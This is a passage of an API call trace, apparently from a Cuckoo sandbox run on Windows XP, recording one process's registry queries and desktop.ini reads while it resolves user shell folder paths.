ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Common Start Menu |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Common Start Menu Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => (\x01\x00\x00\x00\x00\x00\x00&\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
[LocalizedFileNames]
Windows Catalog.lnk=@%SystemRoot%\system32\shell32.dll,-22075
Activate Windows.lnk=@%SystemRoot%\system32\oobe\msoobe.exe,-2000
Set Program Access and Defaults.lnk=@%Syst FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => (\x01\x00\x00\x00\x00\x00\x00&\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
[LocalizedFileNames]
Windows Catalog.lnk=@%SystemRoot%\system32\shell32.dll,-22075
Activate Windows.lnk=@%SystemRoot%\system32\oobe\msoobe.exe,-2000
Set Program Access and Defaults.lnk=@%Syst FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => (\x01\x00\x00\x00\x00\x00\x00&\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
[LocalizedFileNames]
Windows Catalog.lnk=@%SystemRoot%\system32\shell32.dll,-22075
Activate Windows.lnk=@%SystemRoot%\system32\oobe\msoobe.exe,-2000
Set Program Access and Defaults.lnk=@%Syst FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => Common AppData |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000218 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => Common AppData Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Application Data |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => AppData |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => AppData Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\Application Data |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS\system32 |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 DataLength => 4 ValueName => CompareJunctionness Type => 1303220 |
FAILURE | 0x00000002 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS\system32 |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00 ValueName => My Pictures |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00 ValueName => My Pictures Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\My Documents |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures |
SUCCESS | 0x00193e98 | |
